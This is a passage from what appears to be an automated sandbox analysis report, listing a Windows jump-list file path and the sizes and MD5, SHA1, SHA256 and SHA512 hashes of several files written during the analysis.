SHA512ec1fff1b05ca1e4f61f6b57b1f53eaa875587de3bfa3687d95fd705ca85480f15992d504454a17819dfa5f927cd37f67e8c9225b249ecd587ece18ed0884af80
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53a86d84ccf59e88c4ebedfa58ec848bb
SHA17017d07a652cd757c79e221eca79382d03f54a3d
SHA25626a57ef536782246ab6cb702a28ef9fcad15d7781d57d858ea914a6a5576db42
SHA51209e3fa69b50f4191b48c1d5d1d03e2523038deee852c760cda5557731857c1045a3319c12e240869de2c1d8aee2a06147f0f9a8afd1f521eb84271b0222571bb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53a86d84ccf59e88c4ebedfa58ec848bb
SHA17017d07a652cd757c79e221eca79382d03f54a3d
SHA25626a57ef536782246ab6cb702a28ef9fcad15d7781d57d858ea914a6a5576db42
SHA51209e3fa69b50f4191b48c1d5d1d03e2523038deee852c760cda5557731857c1045a3319c12e240869de2c1d8aee2a06147f0f9a8afd1f521eb84271b0222571bb
-
Filesize
2KB
MD51d7edaee522a835b90c27f0a513e75e0
SHA140d8c35c802d1ead44e903881ba33e0011eb5b22
SHA2567b04c1cd0a5d9815d71e74265b01f5ffeaf68cf33f30ab5d31e170f43ae9605b
SHA512f982b63f2760c92acf4cf91229e85eebc9ef98eb234adf82d3b404c3df0f4f976cd836d4396b6fb92be4bf91eb9be0cb71efe925bf3675b1aa28cd383698644f
-
Filesize
7.1MB
MD5d38b0be7a75f44a464fae4850792d85f
SHA1b2f26d385e01704e04b56bde28b3e2a1892e4e7f
SHA25633b1ee0ef1ce8e0a1f9e6b4e192eacf6f94b23836898c8ba27b0c057493a9727
SHA512d7fafa719384524906a42239f5b18a2c2859bdd68eb4fd6ae63ab653c556a88752903f711cf10b5d1f8838858fbd296997e97ebde74735d881ffadd35f09171c
-
Filesize
7.1MB
MD50810352270005ca86d15c8ba0d2704ab
SHA16b5b3d9c32706773b5dfcc2bc6f7a2529480c6fe
SHA256dc8e45248dbc615f80a6cd7a28fbef0d925bdce86bee35762abe45efa57a7a8d
SHA512ec1fff1b05ca1e4f61f6b57b1f53eaa875587de3bfa3687d95fd705ca85480f15992d504454a17819dfa5f927cd37f67e8c9225b249ecd587ece18ed0884af80